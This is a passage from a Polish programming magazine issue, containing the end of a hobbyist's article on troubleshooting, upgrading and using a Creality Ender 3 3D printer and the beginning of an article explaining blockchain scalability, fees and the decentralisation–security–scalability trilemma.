obracał się w miejscu, bezskutecznie próbując podawać filament do Rysunek 9. Z lewej: kostka kalibracyjna wydrukowana przed naprawami. Po prawej: taka
bloku grzewczego, i drukarka przestała drukować. sama kostka po naprawach

<72> { 2 / 2022 < 101 > }


Dobra wiadomość jest taka, że ostatni przytoczony przeze mnie
przykład jest skrajny; zazwyczaj problemy da się rozwiązać w znacz-
nie łatwiejszy sposób. Zła wiadomość jest jednak taka, że problemów
z wydrukiem 3D jest cała masa i trzeba trochę nauczyć się swojej
drukarki, a także procesu drukowania jako takiego, by wiedzieć, jak
je rozwiązać.
Żeby wymienić kilka, możemy mieć na przykład kłopoty z dru-
kowaniem pierwszej warstwy (nieprzyleganie filamentu), drukowa-
niem zbyt małej lub zbyt dużej ilości materiału, nieprzyleganiem
do siebie fragmentów wydruku, artefaktami na ściankach wydruku
(tzw. ghosting), niedokładnym wydrukiem w okolicach pierwszych
warstw (tzw. elephant’s foot albo warping – zawijanie brzegów wy-
druku), drukowaniem mostków, wyciekaniem filamentu podczas
przenoszenia głowicy drukarki (tzw. oozing) i tak dalej.
W większości przypadków problemy wynikają z niewłaściwej
konfiguracji slicera. A konfigurować jest co – popularna Cura po-
zwala na ustawienie (literalnie) dziesiątek, jeśli nawet nie setek para-
metrów wydruku. Przeważnie konieczne jest zlokalizowanie jednego
lub kilku z nich, które odpowiadają za drukowanie określonych ob-
szarów (ścianki, wypełnienie, podpory itp.), a następnie dostosowa-
nie ich do własnych potrzeb. Na szczęście Cura zawiera szablony dla
większości popularnych drukarek – nie wyobrażam sobie ręcznego
konfigurowania tego narzędzia.
Oprócz tego możemy też manualnie pomóc drukarce – na przy-
kład zmniejszając prędkość wydruku podczas kładzenia pierwszych
warstw albo też manipulując temperaturą głowicy i stołu. Zdarza
się też, że można zastosować tanie rozwiązanie mechaniczne, jak na
przykład wspomniane wcześniej prowadnice do filamentu. Czasem
konieczne jest wykonanie konserwacji – naciągnięcie pasków zęba-
tych, ponowne wypoziomowanie stołu czy też oczyszczenie głowicy.
Wreszcie w skrajnych przypadkach – jak we wspomnianym wcze-
śniej – konieczne jest naprawienie uszkodzonych komponentów
urządzenia.
Wśród linków na końcu artykułu umieściłem kilka prowadzą-
cych do stron, na których można znaleźć rozwiązania najpopular-
niejszych problemów z drukowaniem.
DIY
Czy jednak drukowanie 3D jest naprawdę aż tak problematycznym
procesem? Myślę, że nie: po prawidłowym skonfigurowaniu drukar-
ka powinna gładko produkować wydruk za wydrukiem. Należy mieć
jednak na uwadze, że drukarki 3D – a już szczególnie z półki ama-
torskiej – nie są urządzeniami bezobsługowymi. Od czasu do czasu
trzeba coś w nich wyregulować, wymienić lub dołączyć. Konieczne
jest również zapoznanie się choćby w podstawowym zakresie ze spo-
sobem ich funkcjonowania, aby ewentualne usterki móc naprawić
samodzielnie. W większości przypadków wystarczą do tego podsta-
wowe narzędzia, jak śrubokręt czy kombinerki.
Oprócz napraw warto zainwestować trochę w rozbudowę dru-
karki. Gdybym kupował Endera 3 w tej chwili, bez żadnego namysłu
wyposażyłbym się od razu w:
» Alternatywną płytę główną produkowaną przez BigTreeTech.
Dzięki niej drukarka pracuje znacznie ciszej (sterownik jest
32-bitowy i potrafi wysterować silniki krokowe z większą czę-
{ WWW.PROGRAMISTAMAG.PL }
/ Druk 3D. Jak zrobić coś z niczego /
stotliwością, przez co hałasują one znacznie mniej), a ponadto
można bez żadnych problemów podłączyć do niej dodatkowe
akcesoria, jak na przykład czujnik do poziomowania stołu czy
kolorowy ekran dotykowy.
» Aluminiowy ekstruder, znacznie solidniejszy od stockowego
plastikowego.
» Szklany stół – znacznie wygodniejszy niż dostarczona z drukar-
ką elastyczna płyta;
Wymiana każdego z elementów nie jest w żadnej mierze skompli-
kowana, ale rodzi konieczność poświęcenia drukarce trochę czasu
i przed rozpoczęciem przygody z drukowaniem 3D trzeba mieć tego
świadomość. Bardzo pomaga tu jednak społeczność: istnieje chyba
z tuzin filmów na YouTube, które bardzo dokładnie pokazują, jak wy-
mienić w Enderze płytę główną. Można z dużą dozą prawdopodo-
bieństwa stwierdzić, że każda naprawa czy modernizacja tej drukarki
jest gdzieś w Internecie dokładnie opisana.
CO DRUKOWAĆ?
Drukarka 3D pozwala na powołanie do istnienia całego mnóstwa
różnych przedmiotów.
Moim pierwszym wydrukiem była klapka do ulubionej klawiatu-
ry, która złamała się, gdy urządzenie spadło na ziemię. Nie ma więk-
szych szans, by znaleźć tego typu części zamienne w Internecie, więc
zakasałem rękawy, nauczyłem się FreeCada, złapałem suwmiarkę
w rękę i zaprojektowałem dokładną kopię brakującej klapki. Ponie-
waż nie miałem jeszcze wówczas drukarki, wydruk zleciłem wro-
cławskiej firmie; dwa dni później pocztą przyszedł gotowy element,
który pasował jak ulał.
Bardzo popularną grupą drukowanych przedmiotów są narzę-
dzia i przedmioty użytkowe. Możemy na przykład dodrukować sobie
brakujący uchwyt do kamerki GoPro, dodatkowe elementy do torów
kulkowych GraviTrax, uchwyt do mocowania telefonu komórkowego
na statywie, wieszak na słuchawki czy organizer do kart SD i pendri-
ve’ów. Co ważne: w Internecie znajdują się wielkie repozytoria goto-
wych obiektów (jak na przykład popularne Thingiverse), gdzie wspo-
mniane przedmioty można wyszukać i pobrać za darmo.
Oprócz tego drukarka 3D nadaje się świetnie do realizowania
własnych projektów. Wydrukowałem na niej między innymi obudo-
wy do niewielkich komputerków zbudowanych na bazie Raspber-
ry Pi, obudowę do zdalnie sterowanego robota inspekcyjnego oraz
uchwyt pan-tilt do kamerki, pozwalający na obracanie jej w dwóch
osiach.
Drukarka 3D pozwala na osiągnięcie bardzo dużej precyzji wy-
druku, więc jeśli nawet zaistnieje konieczność rozmieszczenia otwo-
rów montażowych w bardzo nietypowej konfiguracji, nie stanowi to
zwykle żadnego problemu. Jedynymi ograniczeniami jest tylko roz-
miar stołu drukarki oraz pewna doza pomysłowości podczas oriento-
wania obiektów tak, aby zostały one prawidłowo wydrukowane.
NA KONIEC
Czy z perspektywy czasu kupiłbym drukarkę 3D po raz drugi? Zde-
cydowanie tak. Urządzenie to pozwoliło mi zrealizować szereg pro-
<73>
PLANETA IT

Rysunek 11. Zdalnie sterowany robot inspekcyjny

Rysunek 10. Małe komputerki zbudowane na bazie Raspberry Pi 3 i 4

jektów, które w innych warunkach pochłonęłyby znacznie więcej cza-
su lub byłyby niepraktyczne albo wręcz niemożliwe do wykonania.
Cały dom mam też naszpikowany różnymi użytkowymi przedmio-
tami, których nie da się kupić lub które trudno byłoby sfabrykować
w inny sposób (najbardziej egzotycznym jest chyba blokada do prze-
łącznika prysznica, który nie chciał sam trzymać się w otwartej po-
zycji). Oprócz tego wydrukowałem kilka zabawek, którymi lubi ba-
wić się moja mała córeczka. Być może z czasem nauczy się korzystać
z programów typu CAD i swoje zabawki będzie mogła projektować,
a potem drukować samodzielnie.
Zakup drukarki pociąga za sobą konieczność wydania znaczącej
sumy pieniędzy, ale jednocześnie niesie on bardzo wymierne korzy-
ści – i to niezależnie od tego, czy jesteśmy makerami i będziemy re-
alizować własne projekty, czy też chcemy po prostu zmaterializować
gotowe, dostępne w Internecie obiekty.

W sieci
Rozwiązywanie problemów z wydrukami 3D:
» https://all3dp.com/1/common-3d-printing-problems-troubleshooting-3d-printer-issues/
» https://www.simplify3d.com/support/print-quality-troubleshooting/
Creality Ender 3 w sklepie botland.pl:
» https://botland.com.pl/drukarki-3d-creality-seria-ender/12198-drukarka-3d-creality-ender-3-6971636408758.html
Creality Ender 3 w Gearbest.com:
» https://www.gearbest.com/3d-printers--3d-printer-kits/pp_3002149216422740.html?wid=2000001#goodsDetail
Alternatywna płyta główna dla Endera 3:
» https://www.3djake.pl/bigtreetech/skr-mini-e3
Aluminiowy ekstruder do Endera 3:
» https://allegro.pl/oferta/ekstruder-aluminiowy-creality-ender-cr-10-prawy-7775880059
Szklane łoże do drukarki 3D:
» https://allegro.pl/oferta/szklo-na-stol-grzewczy-drukarek-3d-220x220-11395635823
Bodaj najbardziej popularne repozytorium obiektów do drukowania:
» https://thingiverse.com

WOJCIECH SURA
wojciechsura@gmail.com
Programuje 30 lat, z czego 15 komercyjnie; ma na koncie aplikacje desktopowe, webowe, mobilne i wbudowane – pisane w C#,
C++, Javie, Delphi, PHP, JavaScript i w jeszcze kilku innych językach. Obecnie pracuje jako architekt w firmie WSCAD, rozwijają-
cej oprogramowanie nowej generacji CAD dla elektrotechników.

<74> { 2 / 2022 < 101 > }

BLOCKCHAIN
Blockchain dla mas
O skalowaniu słów kilka
W ostatnich latach słowo „blockchain” zaczęto odmieniać przez wszystkie przypadki, nie za-
wsze w pozytywnym znaczeniu. Sprawiło to, że coraz więcej osób stało się użytkownikami
rozwiązań tego typu, co doprowadziło do powstania nowych problemów. Jednym z gorących
tematów jest to, jak sprawić, by blockchain był w stanie obsługiwać ogromne ilości transakcji,
nie tracąc przy tym swoich zalet, takich jak np. decentralizacja i bezpieczeństwo. Pojawia się
zatem pytanie, czy jest to osiągalne. Może jednak ta technologia nie jest w stanie działać na
dużą skalę?
T emat skalowalności blockchaina zostanie podzielony na dwa ar-
tykuły. W pierwszej części skupię się na ogólnej tematyce proble-
mu. Opowiem, skąd biorą się problemy oraz co sprawia, że poradze-
nie sobie z nimi nie jest prostym zadaniem. W następnym numerze
przybliżę natomiast konkretne pomysły i metody, które mogą roz-
wiązać obecne niedogodności. Wszystkie zagadnienia postaram się
wytłumaczyć w jak najprostszy sposób, dlatego szczegółowa wiedza
z zakresu blockchaina nie powinna być niezbędna, choć może uła-
twić zrozumienie tego tematu. Dlatego przed lekturą tego artykułu
warto zapoznać się chociażby z podstawowymi zagadnieniami oraz
mechaniką działania tej technologii.
Z WIELKĄ POPULARNOŚCIĄ WIĄŻE SIĘ
WIELKI PROBLEM
Rysunek 1. Korek (źródło: jochenworld.com/Living-in-traffic-jams-for-Suddeutsche)
Każda nowa technologia używana jest na początku jedynie przez
małą grupę osób. I nie ma tutaj znaczenia, czy mówimy o samocho-
dach, telefonii komórkowej czy też o Internecie; sytuacja zawsze wy-
gląda podobnie. Z czasem, o ile tylko dane rozwiązanie się sprawdzi,
grono odbiorców zaczyna się poszerzać, a sam sukces stworzonej in-
nowacji może przerodzić się w jej największy koszmar, który może
doprowadzić do upadku największego nawet wynalazku. Wraz ze
wzrostem użytkowników pojawiają się nowe problemy, którymi nie
<76> { 2 / 2022
przejmowano się na samym początku. Jednak przychodzi taki mo-
ment, że nie da się już ich ignorować i od ich rozwiązania zależy
dalsze powodzenie przedsięwzięcia. Weźmy na tapet przykład samo-
chodów. Każda osoba mieszkająca w większym mieście wie, z jakimi
korkami może się wiązać podróżowanie w godzinach szczytu. Jednak
to nic w porównaniu z tym, co by się działo, gdybyśmy używali in-
frastruktury drogowej sprzed 100 lat. Innym świetnym przykładem
obrazującym problem skalowalności technologii była możliwość,
a raczej jej brak, dodzwonienia się do kogoś w czasie ogromnego
obciążenia sieci. Kilka lat temu można było tego doświadczyć cho-
ciażby w noc sylwestrową, gdy połączenie się z kimkolwiek po godzi-
nie 24 graniczyło z cudem. Jednak dzięki ulepszonym rozwiązaniom
obecnie taki problem już nie występuje. Takich przykładów można
znaleźć setki, jeśli nie tysiące, jednak z czasem ludzie zapominają, że
technologia, której dzisiaj używają, przeszła ogromne zmiany od mo-
mentu swojego powstania.
Nie inaczej jest z blockchainem. Kiedy w 2009 roku wystartował
Bitcoin, nikt nie zajmował się problemem oczekujących transakcji
oraz dużych opłat. Po pierwsze, sama technologia znana była jedynie
bardzo wąskiej grupie osób i myślę, że większość z tych ludzi nie są-
dziła, jak szybko to rozwiązanie trafi do ogromnego grona odbiorców.
Oczywiście w porównaniu do liczby użytkowników samochodów, te-
lefonii komputerowej czy też Internetu społeczność blockchainowa
jest wciąż mała, jednak adopcja samej technologii postępuje najszyb-
ciej w historii [1]. Ułatwia to fakt, że sam blockchain nie potrzebuje
do swojego działania zupełnie nowej infrastruktury. Oczywiście musi
powstać zdecentralizowana sieć, ale cała komunikacja, przechowy-
wanie danych itp. oparta jest na technologiach, które są nam znane
od lat. Dzięki temu, że Internet dotarł już do ponad 3.5 mld ludzi [2],
upowszechnienie takiego rozwiązania jest o wiele łatwiejsze, niż było
to w przypadku innych innowacji. Co ciekawe, pomimo ogromnego
wzrostu użytkowników różnego rodzaju blockchainów, dane pokazu-
ją, że jesteśmy dopiero we wczesnej fazie adopcji.
Dzięki temu, że blockchain z założenia jest otwartą i publiczną
siecią (chociaż można również stworzyć sieć z ograniczonym do-
stępem), możemy łatwo sprawdzić, jak rośnie liczba użytkowników
poszczególnych rozwiązań. Jednym z serwisów, który agreguje i udo-
stępnia takie dane, jest Glassnode. Część informacji wymaga płatnej
subskrypcji, jednak jeśli chodzi o sprawdzenie, jak wygląda przyrost
< 101 > }
BLOCKCHAIN
użytkowników np. dla sieci Bitcoin i Ethereum, to darmowy dostęp
w zupełności wystarczy.
Mała dygresja. Wszystko, co możemy wyciągnąć z blockchaina
i przeanalizować, nazywamy analizą on-chain. Czasem można spo-
tkać się z zarzutem, że przecież dane mogą być zmanipulowane. Na
szczęście Glassnode nie jest jedynym portalem, który się tym zajmu-
je, więc zawsze można porównać otrzymane informacje. Jeśli wciąż
ktoś miałby wątpliwości, to – dzięki temu, że Bitcoin i Ethereum to
publiczne blockchainy – sam może zagregować i sprawdzić wszystkie
dane. Dlatego w mojej opinii możemy przyjąć prezentowane informa-
cje jako prawdziwe, ponieważ zazwyczaj sama możliwość dokonania
weryfikacji przez kogokolwiek odstrasza od potencjalnego oszustwa.
Wróćmy więc do tematu użytkowników blockchaina. Jeśli spoj-
rzymy na dane z Bitcoina, to można zauważyć, że ich liczba wyraźnie
rośnie [4]. Pierwszy duży pik wystąpił w 2013 roku, co miało zwią-
zek z bańką na rynku kryptowalut. To samo zjawisko można było
zaobserwować w 2017 i 2021 roku. Kiedy sytuacja się już uspokoiła
i większość ludzi czyhających na szybki zysk odeszła z rynku, sama
technologia rozwijała się dalej, czemu towarzyszyły kolejne wzrosty.
Dokładnie tak samo sytuacja wygląda dla Ethereum [5]. Ponieważ
ten blockchain jest młodszy od Bitcoina, sumaryczna liczba użyt-
kowników wciąż jest mniejsza, jednak, ze względu na zastosowania
tego rozwiązania, prawdopodobnie niedługo to się zmieni. Powoduje
to, że Ethereum musi zdecydowanie bardziej skupić się na rozwiąza-
niu problemu skalowalności, który obecnie potrafi przyprawić ludzi
o ból glowy.
SZYBKO, TANIO I EFEKTYWNIE
Rysunek 2. Lightning Network
(źródło: makeuseof.com/what-is-bitcoin-lightning-network-how-scale-bitcoin/)
Mówiąc o skalowalności w kontekście blockchaina, należy zastano-
wić się, z czym ona się wiąże. Na pierwszą myśl może przychodzić
szybkość wykonywania transakcji, jednak nie jest to jedyna rzecz,
którą powinniśmy brać pod uwagę. Odnosząc się ponownie do bran-
ży motoryzacyjnej, można śmiało stwierdzić, że samo zwiększenie
ilości pasów na drodze nie pomogłoby w rozwiązaniu wszystkich
problemów. Jeżeli nie zostałaby do tego stworzona pozostała infra-
struktura, taka jak np. odpowiednia liczba stacji benzynowych, to
pojawiłoby się kolejne wąskie gardło, tyle że w innym miejscu. Po-
dobnie jest w przypadku blockchaina. Temu zagadnieniu przyjrzymy
się w dalszej części artykułu, wcześniej jednak omówimy, z czym wią-
że się skalowalność w przypadku tej technologii.
<78>
Pierwszą ważną cechą jest koszt wykonywanych operacji oraz
przechowywania dużych ilości danych. Zapis ogromnej ilości in-
formacji na blockchainie potrafi być bardzo drogi, dlatego nieko-
niecznie wszystkie dane chcielibyśmy tam przechowywać. Dobrym
przykładem są obrazki dla tokenów NFT. Oczywiście można by je
umieścić bezpośrednio na blockchainie, tyle że byłaby to nieopła-
calna operacja. Dobrym rozwiązaniem jest przechowywanie jedynie
referencji do źródła, a sam plik powinien być umieszczony w innym
rozproszonym systemie, jakim jest np. IPFS (Inter Planetary File
System). Jeśli kogoś interesuje, jak działa takie rozwiązanie, polecam
zapoznać się chociażby z materiałami dostępnymi na oficjalnej stro-
nie [6]. W przypadku obrazków można podejść do tematu jeszcze
w inny sposób, np. wykorzystując grafikę wektorową lub generując
je algorytmicznie, co sprawi, że IPFS nie będzie wymagany, ale jest
to jednak temat na osobny artykuł. Kolejnymi ważnymi aspektami
związanymi ze skalowalnością są przepustowość oraz potrzebne za-
soby sieciowe. Pierwszy z nich odnosi się do tego, jak długo będzie
trwało zatwierdzenie transakcji oraz jak dużo danych będzie można
umieścić w pojedynczym bloku. Drugi aspekt natomiast wskazuje,
jak dużo zasobów będzie zużywał cały proces. Znaczny wzrost tego
parametru może prowadzić do zwiększenia czasu niezbędnego do za-
twierdzenia transakcji, co związane jest m.in. z propagacją poszcze-
gólnych bloków w sieci.
Kiedy wiemy już, z czym związana jest skalowalność blockcha-
nina, możemy zastanowić się, co dokładnie wpływa na tę cechę.
Pierwszą i chyba najbardziej oczywistą kwestią będą różnego rodzaju
ograniczenia związane ze sprzętem. Bez względu na to, czy chodzi
o prędkość przesyłania danych, czy samo przetwarzanie transakcji,
jesteśmy ograniczeni tym, co daje nam dzisiejsza technologia. Raczej
nie jest to największy problem, ponieważ z roku na rok sam sprzęt
jest coraz lepszy, Internet coraz szybszy, a cena w stosunku do osią-
gów coraz niższa, jednak dobrze jest pamiętać również o tej sprawie.
Drugą kwestią jest wielkość pojedynczego bloku (ang. block size).
Na pierwszy rzut oka mogłoby się wydawać, że skoro mały blok jest
problemem, to wystarczy zwiększyć jego rozmiar i w ten sposób po-
zbędziemy się niedogodności. Niestety sprawa nie jest taka prosta,
ponieważ niesie to za sobą pewne konsekwencje. Jeśli zwiększymy
ilość danych do przetworzenia, a chcielibyśmy równocześnie za-
chować niezmienny czas zatwierdzenia bloku, wtedy w naszej sie-
ci musielibyśmy wyeliminować słabsze węzły, co prowadziłoby do
zmniejszenia decentralizacji. Z drugiej strony, jeśli nie chcielibyśmy
utrzymać obecnej decentralizacji sieci, to musielibyśmy zwiększyć
odstęp między nowymi blokami. Więcej o tym zagadnieniu nieco
później, kiedy omówiony zostanie tzw. blockchain trilemma. Inną
kwestią jest to, że takie powiększanie bloku prawdopodobnie musia-
łoby występować cyklicznie i byłoby to raczej doraźne łatanie proble-
mu niż usprawnienie całego procesu.
Kolejną sprawą są opłaty transakcyjne, ponoszone przez każ-
dego użytkownika blockchaina, który chce wykonać jakąkolwiek
transakcję. Ponieważ do poprawnego działania sieci potrzebujemy
górników albo walidatorów (w zależności od algorytmu konsensu-
su, na którym dany blockchain jest oparty), musi istnieć jakiś me-
chanizm, który zachęci ich do działania. W przypadku blockchainów
opartych o Proof of Work (PoW) jest to nagroda za każdy wykopany
blok, ale również bonus w postaci opłat transakcyjnych, które trafiają
{ 2 / 2022 < 101 > }
BLOCKCHAIN
do górników. Ponieważ wielkość bloku jest ograniczona, a o kolej-
ności przyjętych transakcji decydują górnicy, logicznym jest, że im
więcej zapłacimy, tym większa szansa, że nasze zlecenie znajdzie się
w najbliższym bloku. Prowadzić to może do takiej sytuacji, w któ-
rej przesłanie kryptowaluty o wartości np. 10 $ może kosztować nas
100 $ i nie jest to niestety wyimaginowany scenariusz. Wystarczy
prześledzić wykres przedstawiający średnie opłaty transakcyjne dla
Bitcoina [7], aby uświadomić sobie, jak zachowuje się ten parametr
przy zbyt obciążonej sieci. Osoby, które mają na co dzień styczność
z rynkiem kryptowalut, zapewne nie raz doświadczyły sytuacji, kiedy
dokonanie jakiejś operacji na Ethereum potencjalnie kosztowałoby
kilkaset, a nawet kilka tysięcy dolarów. Oczywiście ta wartość potra-
fi się bardzo dynamicznie zmieniać, jednak pokazuje to, jak bardzo
może ona wpłynąć na dalszą adopcję tej technologii. Aby jeszcze le-
piej zobrazować, jak poszczególne sieci potrafią być obciążone, warto
prześledzić wykres oczekujących transakcji. Dla Bitcoina będzie to
tzw. mempool [8], a dla Ethereum parametr zwany pending trans-
actions [9]. Zachęcam do obejrzenia ciekawej animacji na stronie
TxStreet [10], która w czasie rzeczywistym przedstawia ruch na Bit-
coinie, Ethereum i kilku innych blockchainach.
SZYBCY I WŚCIEKLI
Rysunek 3. Prędkość transakcji
(źródło: medium.com/@wp.raysnetwork/rays-transaction-speed-6f6d03eb520f)
Mając już pogląd, jakie cechy definiują skalowalność i co na nie
wpływa, warto spojrzeć, jak zachowują się istniejące blockchainy.
Jednym z parametrów, który warto prześledzić, jest liczba transak-
cji na sekundę (TPS, Transaction Per Second). Ale żeby mieć jakiś
punkt odniesienia, spójrzmy najpierw, jak wygląda to w przypadku
innej technologii. Visa obsługuje około 1700 TPS [11], chociaż firma
twierdzi, że ich sieć byłaby w stanie poradzić sobie nawet z 65 tys.
operacji na sekundę [12]. Jak na tym tle prezentuje się najbardziej
znany blockchain? Przyjmuje się, że Bitcoin obsługuje około 7 trans-
akcji na sekundę [13]. W porównaniu do wcześniej przedstawionych
wartości ta liczba wydaje się, łagodnie mówiąc, śmieszna. W przy-
padku Ethereum nie jest dużo lepiej, ponieważ sieć ta przetwarza
około 15 transakcji na sekundę. Jak widać, dwa najbardziej znane
blockchainy nie najlepiej wypadają w tym przypadku. W takim razie
<80>
sprawdźmy inne rozwiązania. Binance Smart Chain, czyli blockchain
stworzony przez największą giełdę kryptowalut Binance, w zeszłym
roku pokazał, że jest w stanie obsłużyć ponad 220 TPS [14]. Wygląda
to dużo lepiej w porównaniu do poprzednich rozwiązań, ale wciąż
nie jest to jakiś imponujący wynik. Sprawdźmy w takim razie jesz-
cze jedno rozwiązanie, a mianowicie Solanę. Twórcy twierdzą, żę ich
rozwiązanie jest w stanie obsłużyć 65 tys. transakcji na sekundę, co
jest identyczną wartością jak w przypadku założeń Visy. Póki co jest
to wartość teoretyczna, ponieważ obecnie Solana obsługuje nieco
ponad 1900 TPS, co i tak jest bardzo dobrym wynikiem. Z drugiej
strony, czy porównywanie tych rozwiązań do Visy ma sens? Może
i w przypadku Bitcoina jest to właściwe, ponieważ zarówno Visa, jak
i Bitcoin służą do operacji finansowych. Natomiast blockchainy, któ-
re obsługują również smart contracty, mają zdecydowanie więcej do
zrobienia, a zatem muszą być znacznie szybsze.
Wspomniany wcześniej pending transactions zależy w dużej mie-
rze od wielkości bloku oraz czasu jego przetworzenia. Zobaczmy, jak
to wygląda w przypadku poszczególnych blockchainów. Bitcoin do-
starcza każdy nowy blok średnio co 10 min., jego wielkość to 1 MB,
a przeciętna pojedyncza transakcja zajmuje 250 bajtów. Sprawę po-
prawia nieco wprowadzone rozwiązanie zwane SegWit. W uprosz-
czeniu można powiedzieć, że wielkość bloku jest w stanie wynieść
nawet 4 MB, jednak temat jest nieco bardziej skomplikowany, dlatego
nie będę się tu w niego zagłębiał.
Jak w takim razie na tym tle wypada Ethereum? Teoretycznie moż-
na stwierdzić, że obecnie wielkość jednego bloku to około 80 KB [16],
a czas jego dołączenia waha się między 12 a 14 sekund. Jednak
w przypadku tego blockchaina musimy użyć całkowicie innej mia-
ry, a mianowicie ilości tzw. gazu (ang. gas). Zanim przejdę do kon-
kretnych wartości, warto powiedzieć, co to takiego i dlaczego w tym
przypadku nie powinno się mówić o wielkości bloku w kontekście
megabajtów. Ponieważ Ethereum pozwala na tworzenie inteligent-
nych kontraktów, operacje, jakie można wykonać na tym blockcha-
inie, to nie tylko prosty przesył wartości. W zależności od tego, jak
dana procedura będzie skomplikowana, inna ilość gazu będzie po-
trzebna do jej wykonania. Oczywiście istnieją sposoby optymalizacji
kontraktów, aby zużywały mniej tego zasobu, jednak jest to temat na
osobny artykuł, dlatego nie będę go tutaj poruszał.
Żeby lepiej zrozumieć, czym jest gaz, możemy porównać go do
paliwa napędzającego nasze samochody. Do przejechania 20 km au-
tostradą będziemy potrzebowali inne ilości paliwa, niż do pokona-
nia tej samej odległości, ale przez zakorkowane miasto. Co więcej,
wartość prawdopodobnie będzie się różnić dla różnych pojazdów.
Podobnie sprawa ma się w przypadku kontraktów. Dokonując wy-
miany kryptowaluty przy pomocy giełdy Uniswap, ilość gazu zużyta
do transakcji może być inna niż w przypadku SushiSwap, ponieważ
wszystko zależy od tego, co znajduje się w kodzie. Koszt poszczegól-
nych operacji można znaleźć w tzw. yellow paper [17].
Zatem ile gazu jest w stanie pomieścić pojedynczy blok Ethe-
reum? Przyjmuje się, że docelową wartością jest 15 mln jednostek.
W zależności od obciążenia sieci ilość gazu w bloku może zarówno
rosnąć, jak i maleć, a obecnie maksymalnie może wynosić 30 mln
jednostek. Teoretycznie więc mogłoby się okazać, że w bloku znaj-
dzie się tylko jedna transakcja, która zużyje cały limit gazu, jednak
w praktyce takie rzeczy nie mają miejsca. W przypadku Binance
{ 2 / 2022 < 101 > }

Smart Chain wielkość bloku jest większa i wynosi 100 mln jednostek
gazu, natomiast każdy blok pojawia się średnio co 3 sekundy. Jak wi-
dać, różne blockchainy mogą mieć całkowicie inne parametry, ale czy
to oznacza, że powinniśmy porzucić Ethereum, ponieważ inne roz-
wiązania są lepsze? Niekoniecznie.
WYBIERZ MĄDRZE
Rysunek 4. Blockchain trilemma (źródło: ledger.com/academy/what-is-the-blockchain-trilemma)
Podczas pracy nad projektami można bardzo często natknąć się na
tzw. trylematy. Chyba najbardziej znaną sytuacją jest ta, w której
klient chciałby, aby projekt dla niego został wykonany szybko, dobrze
i tanio. Ale jak to bywa w przypadku trylematów, zazwyczaj nie da
się osiągnąć wszystkich tych trzech cech. Dlatego w takim przypadku
jeśli coś ma być zrobione np. tanio i szybko, to z wielkim prawdo-
podobieństwem ucierpi na tym jakość całego przedsięwzięcia. Na-
tomiast jeśli ten sam projekt miałby być wykonany szybko i dobrze,
to zapewne w takim przypadku koszty nie będą małe.
Podobna sytuacja występuje w odniesieniu do blockchaina, tyle
że ten trylemat dotyczy innych cech, a mianowicie decentralizacji,
bezpieczeństwa oraz skalowalności. Żeby lepiej zrozumieć, dlaczego
osiągnięcie tych trzech celów równocześnie jest bardzo trudne, wyja-
śnijmy na początku, z czym związane są dwa pierwsze pojęcia, O sa-
mej skalowalności zostało już wiele powiedziane, dlatego pominiemy
ponowną analizę tego zagadnienia.
Kiedy wspominamy o decentralizacji, mamy na myśli system,
który nie zależy od jakiejkolwiek jednostki centralnej. Innymi słowy
nie istnieje żadna instytucja, osoba czy inny podmiot, które byłyby
w stanie swoimi decyzjami kontrolować to, co się dzieje. W takim
systemie wszyscy uczestniczy działaliby na równych prawach, bez
podziału na równych i równiejszych. Przykładem blockchainów, któ-
re są bardzo mocno zdecentralizowane, mogą być np. Bitcoin i Ethe-
reum. Można tutaj oczywiście dyskutować na temat centralizacji du-
żych kopalni, szczególnie w przypadku tego pierwszego blockchaina,
jednak cała sieć i zasady jej działania sprawiają, że nie jest to obecnie
problem.
Bezpieczeństwo to zdolność systemu do prawidłowego działania,
ale również obrona przed atakami, błędami oraz innymi nieprzewi-
dzianymi sytuacjami. W blockchainie dodatkowym utrudnieniem
w stosunku do tradycyjnych rozwiązań jest fakt, że większość sieci
jest publicznie dostępnych, co zdecydowanie ułatwia znalezienie
potencjalnych dziur. Jedną z ważniejszych kwestii w przypadku bez-
pieczeństwa jest to, jaki algorytm konsensusu został wykorzystany.
Dzięki temu, że Bitcoin oparty jest o PoW, a cała sieć jest zabezpie-
czona ogromną ilością mocy obliczeniowej, możemy być niemal
{ WWW.PROGRAMISTAMAG.PL }
/ Blockchain dla mas /
pewni, że żadna transakcja nie jest zmanipulowana, a nasze środki
są bezpieczne.
Dlaczego w takim razie osiągnięcie tych trzech cech równocze-
śnie jest bardzo trudne? Posłużę się przykładem, jakim jest tzw. atak
51%. W skrócie polega on na przejęciu przynajmniej 51% całej sieci,
co dałoby możliwość manipulowania danymi. Raczej nie chcieliby-
śmy dopuścić do takiej sytuacji, dlatego dobrym rozwiązaniem by-
łoby uczynienie naszej sieci jak najbardziej zdecentralizowaną. Ła-
twiej byłoby przecież przekonać 5 z 10 węzłów do oszustwa, niż 5000
z 10000. Niestety dołączenie większej ilości węzłów do takiej sieci
spowoduje również jej spowolnienie, ponieważ każda informacja
będzie musiała być wymieniana przez większą liczbę użytkowników.
Jak można zauważyć, łatwo jest połączyć ze sobą bezpieczeństwo
i decentralizację. Z drugiej strony możemy stworzyć szybką i bez-
pieczną sieć, jednak odbędzie się to kosztem decentralizacji. Oczywi-
ście wciąż jest to lepszy model niż całkowite scentralizowanie syste-
mu, jednak trzeba być również świadomym ryzyk, jakie niosą za sobą
tak funkcjonujące blockchainy.
Wróćmy raz jeszcze do pytania związanego z sensownością użyt-
kowania Ethereum. Jak widać, to, że inne blockchainy są szybsze, nie
znaczy wcale, że są w każdym aspekcie lepsze. Wspomniany Binance
Smart Chain oczywiście oferuje większą liczbę transakcji na sekundę,
jednak robi to wszystko kosztem decentralizacji. Ethereum ma obec-
nie ponad 5 tys. aktywnych węzłów, a w szczytowym momencie było
ich nawet ponad 12 tys. Co więcej, przechodząc na Ethereum 2.0,
które, jeśli wszystko pójdzie dobrze, usprawni bardzo wiele w kwestii
skalowalności, liczba walidatorów będzie znacznie większa. Już w tej
chwili jest ich niemal 300 tys. [19]. Dla porównania, BSC ma zale-
dwie 21 walidatorów [20]. Dzięki temu sieć działa bardzo szybko,
jednak potencjalnie może być narażona na manipulacje. Na szczęście
rozwiązanie problemu trylematu jest możliwe, ale wymaga nieco in-
nego spojrzenia na blockchain.
BLOCKCHAIN JEST JAK CEBULA
Rysunek 5. Shrek (źródło: theodysseyonline.com/am-an-onion)
Prawdopodobnie każdy, a przynajmniej większość, kojarzy pierw-
szą część Shreka i scenę, w której tytułowy bohater tłumaczy osłowi,
co wspólnego mają ogry i warzywo, które potrafi wyciskać łzy. Mo-
glibyśmy sparafrazować ten dialog i powiedzieć, że blockchain jest
jak cebula. I nie, nie mam tu na myśli tego, że rozwiązania tworzone
